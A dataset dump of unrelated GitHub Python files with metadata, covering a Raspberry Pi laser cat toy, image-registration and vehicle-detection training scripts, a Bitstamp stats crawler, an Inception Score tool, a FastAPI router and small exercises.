+{"seq_id":"38594415319","text":"import RPi.GPIO as GPIO\nimport time\nimport random\nrandom.seed()\n\n#set pins\nGPIO.setmode (GPIO.BOARD)\nGPIO.setwarnings (False)\nGPIO.setup (11, GPIO.OUT) #laser power\nGPIO.setup (13, GPIO.OUT) #X-servo\nGPIO.setup (15, GPIO.OUT) #Y-servo\nGPIO.setup (19, GPIO.IN, pull_up_down=GPIO.PUD_UP) #in from IR\n\n#setup servo pwm\np = GPIO.PWM (13, 50)\nq = GPIO.PWM (15, 50)\n\n#set both servos to center to start\np.start (7.5)\nq.start (7.5)\n\ndef moveServos():\n \"Turns on laser and moves X- and Y-servos randomly\"\n lightLaser ()\n\n p.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n\n p.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n\n dimLaser ()\n\ndef lightLaser():\n GPIO.output (11, 1)\n\ndef dimLaser():\n GPIO.output (11, 0)\n\n#main loop\nwhile True:\n #check for input from sensor\n if GPIO.input (19):\n moveServos()\n time.sleep (0.5) #wait a half sec before polling sensor\n else:\n dimLaser()\n time.sleep (0.5)\n","repo_name":"Apress/Learn-Rasp-Pi-Program-Python","sub_path":"Chapter9/cat_toy.py","file_name":"cat_toy.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"}
+{"seq_id":"37308223913","text":"import torch\nfrom torch.distributed import barrier\nimport os\n\nfrom cmdline import *\nfrom atlas import *\n\noasis_ds_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\noasis_ds_test_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_test_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\n\ndeepaffinefile = f'{prefix}deepaffine_{suffix}.pth'\nI_deepaffine, affine_net, epoch_losses_deepaffine, full_losses_deepaffine, \\\n iter_losses_deepaffine, test_losses_deepaffine \\\n = torch.load(deepaffinefile, map_location=loc)\nI_deepaffine = I_deepaffine.to(loc)\n\nfluid_params = [.1,0,.01]\nreg_weight = 1e4\n\nif rank == 0: torch.save(fluid_params, f'{prefix}fluidparams_{suffix}.pth')\nconvlddmmfile = f'{prefix}convlddmm_{suffix}.pth'\nif not os.path.isfile(convlddmmfile): # conventional lddmm atlas\n print(\"Conventional LDDMM atlas building\")\n res = lddmm_atlas(dataset=oasis_ds_std,\n I0=I_deepaffine.clone().to('cuda'),\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=5e4,\n reg_weight=reg_weight,\n momentum_preconditioning=False,\n batch_size=30,\n num_epochs=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmfile)\nelse:\n torch.load(convlddmmfile, map_location='cpu')\nbarrier()\nIlddmm, _, _, _ = res\nIlddmm = Ilddmm.to(loc)\n\n# On the test set, use same atlas-building code but with zero learning rate for\n# the image\nconvlddmmtestfile = f'{prefix}convlddmm_test_{suffix}.pth'\nif not os.path.isfile(convlddmmtestfile): # conventional lddmm atlas\n print(\"Conventional LDDMM Test\")\n res = lddmm_atlas(dataset=oasis_ds_test_std,\n I0=Ilddmm,\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=0e4,\n momentum_preconditioning=False,\n reg_weight=reg_weight,\n batch_size=30,\n num_epochs=1,\n lddmm_steps=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmtestfile)\n del res\n#Ilddmm, mom_lddmm, epoch_losses, iter_losses = torch.load(convlddmmtestfile,\n #map_location=loc)\n","repo_name":"jacobhinkle/diffeomorphic_autoencoders","sub_path":"run_convlddmm.py","file_name":"run_convlddmm.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"25461703327","text":"import pygame\nfrom GObject import GObject, Constants\nfrom text import Text\nfrom graph import Graph\n\n\nclass ControlPanel(GObject):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.width = 300\n self.image = pygame.Surface((self.width, Constants.HEIGHT.value))\n self.image.set_alpha(100)\n self.image.fill(Constants.WHITE.value)\n self.rect = self.image.get_rect()\n self.rect.right = Constants.WIDTH.value\n self.rect.bottom = Constants.HEIGHT.value\n # GObject.all_objects.add(self)\n GObject.control_panel.add(self)\n\n self.population_graph = Graph(y=GObject.current_population_list,\n x=GObject.duration_cell_list,\n size=(250, 150))\n self.population_graph.rect.centerx, self.population_graph.rect.top = (Constants.WIDTH.value - 150, 20)\n self.population_graph.color = Constants.RED.value\n self.population_graph.xlabel.text = 'Frames'\n self.population_graph.ylabel.text = 'Count of cells'\n\n self.current_food_graph = Graph(y=GObject.current_food_list,\n x=GObject.duration_food_list,\n size=(250, 150))\n self.current_food_graph.rect.centerx = Constants.WIDTH.value - 150\n self.current_food_graph.rect.top = self.population_graph.rect.bottom + 40\n self.current_food_graph.color = Constants.BLUE.value\n self.current_food_graph.xlabel.text = 'Frames'\n self.current_food_graph.ylabel.text = 'Count of food'\n\n self.count_of_extinction = Text(30)\n self.fps = Text(30)\n self.duration = Text(30)\n self.current_food = Text(30)\n self.total_food = Text(30)\n self.current_population = Text(30)\n self.total_born = Text(30)\n\n def update(self):\n self.count_of_extinction.update(text=f'Count of extinction: {GObject.count_of_extinction}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 210),\n color=Constants.BLACK.value)\n self.duration.update(text=f'Duration: {GObject.duration // 60}m or {GObject.duration // 3600}h',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 180),\n color=Constants.BLACK.value)\n self.fps.update(text=f'FPS: {GObject.fps}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 150),\n color=Constants.BLACK.value)\n self.current_food.update(text=f'Current food: {len(GObject.food)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 120),\n color=Constants.BLACK.value)\n self.total_food.update(text=f'Total food: {GObject.count_of_food_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 90),\n color=Constants.BLACK.value)\n self.current_population.update(text=f'Current population: {len(GObject.cells)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 60),\n color=Constants.BLACK.value)\n self.total_born.update(text=f'Total born: {GObject.count_of_cells_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 30),\n color=Constants.BLACK.value)\n self.population_graph.update()\n self.current_food_graph.update()\n\n def draw(self):\n pygame.display.get_surface().blit(self.image, (self.rect.x, self.rect.y))\n self.count_of_extinction.draw()\n self.duration.draw()\n self.fps.draw()\n self.current_food.draw()\n self.total_food.draw()\n self.current_population.draw()\n self.total_born.draw()\n self.population_graph.draw()\n self.current_food_graph.draw()\n","repo_name":"vallenov/TheLittleLife","sub_path":"control_panel.py","file_name":"control_panel.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24094968130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 22 07:40:04 2017\n\n@author: jerome\n\"\"\"\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nimport pickle\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\nfrom skimage.feature import hog\nfrom lesson_functions import *\nfrom find_object import *\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n elif color_space == 'SVCb':\n feature_image1 = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n feature_image2 = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n feature_image3 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n feature_image = np.dstack((feature_image1[:,:,2],feature_image2[:,:,2],feature_image3[:,:,2]))\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True)) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=0, spatial_feat=True, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #2) Iterate over all windows in the list\n for 
window in windows:\n #3) Extract the test window from original image\n test_img = cv2.resize(img[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64)) \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n return on_windows\n\n# Read in cars and notcars from large dataset\ncars = glob.glob('./dataset/vehicles/*/*.png')\nnotcars = glob.glob('./dataset/non-vehicles/*/*.png')\n\n### TODO: Tweak these parameters and see how the results change.\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [None, None] # Min and max in y to search in slide_window()\n\ncar_features = extract_features(cars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\nnotcar_features = extract_features(notcars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X)\n# Apply the scaler to X\nscaled_X = X_scaler.transform(X)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n#############\n# Parameter Estimation for SVM\n#X_train, X_test, y_train, y_test = train_test_split(\n# scaled_X, y, test_size=0.5, random_state=0)\n# Set the dataset in two equal parts\n#tuned_parameters = [{'kernel':['rbf'], 'gamma':[1e-3,1e-4], 'C': [1,10,100,1000]},\n# {'kernel':['linear'], 'C': [1,10,100,1000]}]\n#clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5)\n#clf.fit(X_train,y_train)\n#print(clf.best_params_)\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.2, random_state=rand_state)\n\nprint('Using:',orient,'orientations',pix_per_cell,\n 'pixels per cell and', cell_per_block,'cells per block')\nprint('Feature vector length:', len(X_train[0]))\n# Use a linear SVC \nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check 
the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n# Check the prediction time for a single sample\n\nf = open(\"svc_pickle.p\", \"wb\" )\nparams ={\"svc\":svc, \"scaler\":X_scaler, \"orient\":orient, \"pix_per_cell\":pix_per_cell, \"cell_per_block\":cell_per_block, \n \"spatial_size\":spatial_size, \"hist_bins\":hist_bins}\npickle.dump(params, f)\nf.close()\n\nt=time.time()\n\nimg = mpimg.imread('test_images/test1.jpg')\n\nystart = 400\nystop = 656\n \nheat = np.zeros_like(img[:,:,0]).astype(np.float)\n\nbox_list = []\n\nfor scale in np.arange(0.5,2,0.2) :\n box_list = find_cars(img,box_list, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n\n# Add heat to each box in box list\nheat = add_heat(heat,box_list)\n \n# Apply threshold to help remove false positives\nheat = apply_threshold(heat,10) # 20 was best\n\n# Visualize the heatmap when displaying \nheatmap = np.clip(heat, 0, 255)\n\n# Find final boxes from heatmap using label function\nlabels = label(heatmap)\ndraw_img = draw_labeled_bboxes(np.copy(img), labels)\n\nplt.imshow(heatmap)\n","repo_name":"Jaeyong-Han/Self-Driving-Car_Nanodegree","sub_path":"CarND-Project5_Vehicle-Detection/search_classify.py","file_name":"search_classify.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"73187922330","text":"import json\nimport logging\nimport os\nimport time\nfrom typing import Any, Dict, List, Optional\n\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef merge_data(prev: List[Dict[str, Any]], curr: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n '''Merge curr into prev, the element in list must have a date field.'''\n for c in curr:\n x: Optional[Dict[str, Any]] = None\n for p in prev:\n if p['date'] == c['date']:\n x = p\n break\n if x is None:\n prev.append(c)\n else:\n x.update(c)\n return sorted(prev, key=lambda d: d['date'])\n\n\ndef http_get(url: str, field_name: str) -> List[Dict[str, Any]]:\n resp = requests.get(url=url)\n if resp.status_code == 200:\n data = resp.json()\n return data[field_name]\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_coins() -> List[str]:\n url = 'https://www.bitstamp.net/api/v2/trading-pairs-info/'\n resp = requests.get(url=url)\n if resp.status_code == 200:\n symbols = resp.json()\n coins = [s['name'].split('/')[0].lower() for s in symbols]\n coins = sorted(list(set(coins)))\n return coins\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_price(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/price'\n curr = http_get(url=url, field_name='price')\n file_path = f'./data/price-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_transactions(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/transactions'\n curr = http_get(url=url, field_name='txsStats')\n file_path = f'./data/transactions-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_addresses(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/addresses'\n curr = http_get(url=url, field_name='addressesStats')\n file_path = f'./data/addresses-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_large_transactions(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/large_transactions'\n file_path = f'./data/large_transactions-{coin}.json'\n curr = http_get(url=url, field_name='largeTxs')\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\nif __name__ == \"__main__\":\n # // 8000 requests per 10 minutes, see `REQUEST LIMITS` at https://www.bitstamp.net/api/\n cooldown_time = 0.075\n coins = get_coins()\n for coin in coins:\n logging.info(coin)\n get_price(coin)\n time.sleep(cooldown_time)\n get_transactions(coin)\n time.sleep(cooldown_time)\n get_addresses(coin)\n time.sleep(cooldown_time)\n get_large_transactions(coin)\n 
time.sleep(cooldown_time)\n","repo_name":"crypto-crawler/bitstamp-insights","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"74190914652","text":"'''\n1. 공백을 기준으로 slice후 리스트 저장: str.slice()\n2. list[i] %2 == 0 : upper\n3. list[i] %2 != 0 : lower\n'''\n\ndef solution(s):\n answer = ''\n new_list = s.split(' ')\n for i in new_list:\n for j in range(len(i)):\n if j%2==0:\n answer += i[j].upper()\n else:\n answer += i[j].lower()\n answer += ' '\n return answer[0:-1]\n \n \n\nprint(solution(\"try hello world\"))","repo_name":"dayowoo/Algorithm-Study","sub_path":"programmers/Level1/이상한 문자 만들기.py","file_name":"이상한 문자 만들기.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24473868260","text":"import sqlite3\nimport mutagen\n\n\nclass Album:\n def __init__(self, db_path):\n self.db_path = db_path\n self.conn = sqlite3.connect(self.db_path)\n self.cur = self.conn.cursor()\n\n # def __del__(self):\n # self.conn.close()\n\n def add_album(self, title, artist_name):\n self.cur.execute(\"SELECT id FROM artist WHERE name = ?\", (artist_name,))\n artist_id = self.cur.fetchone()\n if not artist_id:\n self.cur.execute(\"INSERT INTO artist (name) VALUES (?)\", (artist_name,))\n artist_id = self.cur.lastrowid\n else:\n artist_id = artist_id[0]\n self.cur.execute(\"INSERT INTO album (title, artist_id) VALUES (?, ?, ?)\", (title, artist_id))\n self.conn.commit()\n\n def delete_album(self, album_id):\n self.cur.execute(\"DELETE FROM album WHERE id = ?\", (album_id,))\n self.conn.commit()\n\n def modify_tag(self, album_id, field, value):\n self.cur.execute(\"SELECT filename FROM library WHERE album_id = ?\", ( album_id,))\n filenames = self.cur.fetchall()\n for filename in filenames:\n try:\n audio = mutagen.File(filename[0])\n if audio:\n audio[field] = value\n audio.save()\n except Exception as e:\n print(f\"Error modifying tag for {filename[0]}: {e}\")\n\n def show(self, album_id):\n self.cur.execute(\n \"SELECT album.title, artist.name FROM album JOIN artist ON album.artist_id = artist.id WHERE album.id = ?\",\n (album_id,))\n row = self.cur.fetchone()\n if row:\n print(f\"Album: {row[0]}\")\n print(f\"Artist: {row[1]}\")\n self.cur.execute(\"SELECT title, artist, duration, genre FROM library WHERE album_id = ?\", (album_id,))\n rows = self.cur.fetchall()\n for row in rows:\n print(row)\n","repo_name":"kandriadze/cli_id3","sub_path":"Album.py","file_name":"Album.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13642561739","text":"'''\nFrom https://github.com/tsc2017/Inception-Score\nCode derived from https://github.com/openai/improved-gan/blob/master/inception_score/model.py and https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py\n\nUsage:\n Call get_inception_score(images, splits=10)\nArgs:\n images: A numpy array with values ranging from 0 to 255 and shape in the form [N, 3, HEIGHT, WIDTH] where N, HEIGHT and WIDTH can be arbitrary. \n dtype of the images is recommended to be np.uint8 to save CPU memory.\n splits: The number of splits of the images, default is 10.\nReturns:\n Mean and standard deviation of the Inception Score across the splits.\n'''\n\nimport os, sys\nimport functools\nimport time\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import functional_ops\ntfgan = tf.contrib.gan\n\n\nclass InceptionScore():\n def __init__(self, batch_size, name):\n self.batch_size = batch_size \n self.inception_images = tf.placeholder(tf.float32, [self.batch_size, 3, None, None])\n self.logits = self.inception_eval(name)\n\n def inception_eval(self, name):\n images = self.inception_images\n images = tf.transpose(images, [0, 2, 3, 1])\n size = 299\n images = tf.image.resize_bilinear(images, [size, size])\n generated_images_list = array_ops.split(images, num_or_size_splits=1)\n logits = functional_ops.map_fn(\n fn = functools.partial(tfgan.eval.run_inception, output_tensor=name),\n elems = array_ops.stack(generated_images_list),\n parallel_iterations = 1,\n back_prop = False,\n swap_memory = True,\n name = 'RunClassifier')\n logits = array_ops.concat(array_ops.unstack(logits), 0)\n return logits\n\n def get_inception_probs(self, sess, inps):\n n_batches = len(inps) // self.batch_size\n preds = np.zeros([n_batches * self.batch_size, 1000], dtype=np.float32)\n for i in tqdm(range(n_batches)):\n inp = inps[i * self.batch_size : (i + 1) * self.batch_size] / 127.5 - 1\n preds[i * self.batch_size : (i + 1) * self.batch_size] = sess.run(self.logits, feed_dict={self.inception_images: inp})[:, :1000]\n preds = np.exp(preds) / np.sum(np.exp(preds), 1, keepdims=True)\n return preds\n\n def preds2score(self, preds):\n scores = []\n splits = 1\n for i in range(splits):\n part = preds[(i * preds.shape[0] // splits):((i + 1) * preds.shape[0] // splits), :]\n kl = part * (np.log(part) - np.log(np.expand_dims(np.mean(part, 0), 0)))\n kl = np.mean(np.sum(kl, 1))\n scores.append(np.exp(kl))\n return np.mean(scores), np.std(scores)\n\n def get_inception_score(self, images):\n assert(type(images) == np.ndarray)\n assert(len(images.shape) == 4)\n assert(images.shape[1] == 3)\n assert(np.min(images[0]) >= 0 and np.max(images[0]) > 10), 'Image values should be in the range [0, 255]'\n print('Calculating Inception Score with %i images in %i splits' % (images.shape[0], 1))\n start_time = time.time()\n with tf.Session() as sess:\n preds = self.get_inception_probs(sess, images)\n mean, std = self.preds2score(preds)\n print('Inception Score calculation time: %f s' % (time.time() - start_time))\n return mean, std # Reference values: 11.34 for 49984 CIFAR-10 training set images, or mean=11.31, std=0.08 if in 10 splits.\n\ndef get_images_from_files(path):\n import cv2\n #images = np.empty(shape=[50000, 3, 32, 32], dtype=np.uint8) # CIFAR10\n #images = np.empty(shape=[100000, 3, 48, 48], dtype=np.uint8) # STL10 (unlabeled, resized)\n images = 
np.empty(shape=[50000, 3, 48, 48], dtype=np.uint8) # STL10 (generated)\n idx = 0\n for root, dir, files in os.walk(path):\n for file in files:\n if file.endswith(tuple(['.jpg', '.png', 'bmp'])):\n image_path = os.path.join(root, file)\n img = cv2.imread(image_path)\n img = img[:, :, (2, 1, 0)] # BGR to RGB \n img = np.transpose(img, (2, 0, 1)) # RGB, H, W \n images[idx] = img\n idx += 1\n if idx >= images.shape[0]:\n break\n print('images.shape: {}'.format(images.shape))\n return images\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated GPU list to use')\n parser.add_argument('--data_dir', help='path to data folder')\n args = parser.parse_args()\n\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu \n\n images = get_images_from_files(args.data_dir) \n mean, std = InceptionScore(64, 'logits:0').get_inception_score(images)\n print('IS: ', mean, std)\n\n # images = get_images_from_files(args.data_dir)\n # with tf.Session() as sess:\n # preds = InceptionScore(100, 'pool_3:0').get_inception_probs(sess, images)\n # #np.save('/home/minje/dev/dataset/cifar/cifar10_inception_pool_3.npy', preds)\n # np.save('/home/minje/dev/dataset/stl/stl_unlabeled_inception_pool_3.npy', preds)\n \n\n","repo_name":"swotr/snwgan","sub_path":"IS/inception_score.py","file_name":"inception_score.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"5168009945","text":"\"\"\"see https://adventofcode.com/2022/day/1\"\"\"\r\n\r\nfrom argparse import ArgumentParser\r\nfrom typing import Iterator\r\n\r\ndef make_parser() -> ArgumentParser:\r\n parser = ArgumentParser()\r\n parser.add_argument(\"input\", help=\"input file\")\r\n return parser\r\n\r\ndef split_on(s, seq):\r\n \"\"\"splits seq on s\"\"\"\r\n acc = []\r\n for each in seq:\r\n if each == s:\r\n yield acc\r\n acc = []\r\n else:\r\n acc.append(each)\r\n yield acc\r\n\r\nif __name__ == '__main__':\r\n matches = make_parser().parse_args()\r\n with open(matches.input, 'r') as fptr:\r\n input = fptr.readlines()\r\n nums = [int(l) if l.strip().isnumeric() else None for l in input]\r\n elves_split: list[list[int]] = list(split_on(None, nums))\r\n cals: list[int] = list(map(sum, elves_split))\r\n print(max(cals))\r\n cals.sort(reverse=True)\r\n top_3: list[int] = cals[:3]\r\n print(f\"top 3: {top_3}\")\r\n print(f\"total of top 3: {sum(top_3)}\")","repo_name":"vernonrj/advent2022","sub_path":"day01/puzzle01.py","file_name":"puzzle01.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"10071086313","text":"from typing import List\nfrom uuid import UUID\n\nfrom fastapi import Depends\nfrom fastapi_utils.cbv import cbv\nfrom fastapi_utils.inferring_router import InferringRouter\nfrom fastapi_utils.api_model import APIMessage\n\nfrom ..services import OrderItemService\nfrom ..schemas import (\n OrderItemCreate, OrderItemUpdate, OrderItemGet,\n)\nfrom .base_api import BaseAPI\n\nrouter = InferringRouter()\n\n\n# noinspection PyTypeChecker\n@cbv(router)\nclass OrderItemAPI(BaseAPI):\n service: OrderItemService = Depends()\n\n @router.get('/')\n async def get_many(\n self, offset: int = 0, limit: int = 20,\n order_uid: UUID = None\n ) -> List[OrderItemGet]:\n return await self._get_many(\n limit, offset, order_uid=order_uid\n )\n\n @router.get(\"/{uid}/\")\n async def get_one(\n self, uid: UUID\n ) -> OrderItemGet:\n return await self._get_one(uid)\n\n @router.post(\"/\")\n async def create_one(\n self, obj: OrderItemCreate\n ) -> OrderItemGet:\n return await self._create_one(obj)\n\n @router.put(\"/{uid}/\")\n async def update_one(\n self, uid: UUID, obj: OrderItemUpdate\n ) -> OrderItemGet:\n return await self._update_one(obj, uid)\n\n @router.delete(\"/{uid}/\")\n async def delete_one(\n self, uid: UUID\n ) -> APIMessage:\n return await self._delete_one(uid)\n","repo_name":"ashapochka/chainvoice","sub_path":"app/api/order_item_api.py","file_name":"order_item_api.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
